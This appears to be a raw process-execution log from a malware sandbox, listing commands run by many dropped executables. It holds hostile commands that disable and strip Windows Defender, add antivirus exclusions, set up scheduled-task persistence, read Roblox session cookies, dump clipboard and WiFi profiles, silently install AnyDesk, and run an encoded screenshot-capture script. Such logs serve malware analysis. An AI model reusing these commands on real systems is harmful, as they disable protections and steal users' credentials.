"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1920 -ip 1920
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1220
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4016 -s 384
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp" /SL5="$D0230,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 4548 -ip 4548
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4548 -s 492
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4388 -s 2248
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6052 -s 700
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 5516 -ip 5516
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 4016 -ip 4016
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4016 -s 668
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2976 -ip 2976
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 1272
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6D572EB81CD218E5FBCEEECAD339B1B7
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe" --commit fullExeInstall
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe"
C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6848 -ip 6848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 76
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5604 -ip 5604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1160
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F0.tmp\1F1.tmp\1F2.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3DF0.tmp\3DF1.tmp\3DF2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAA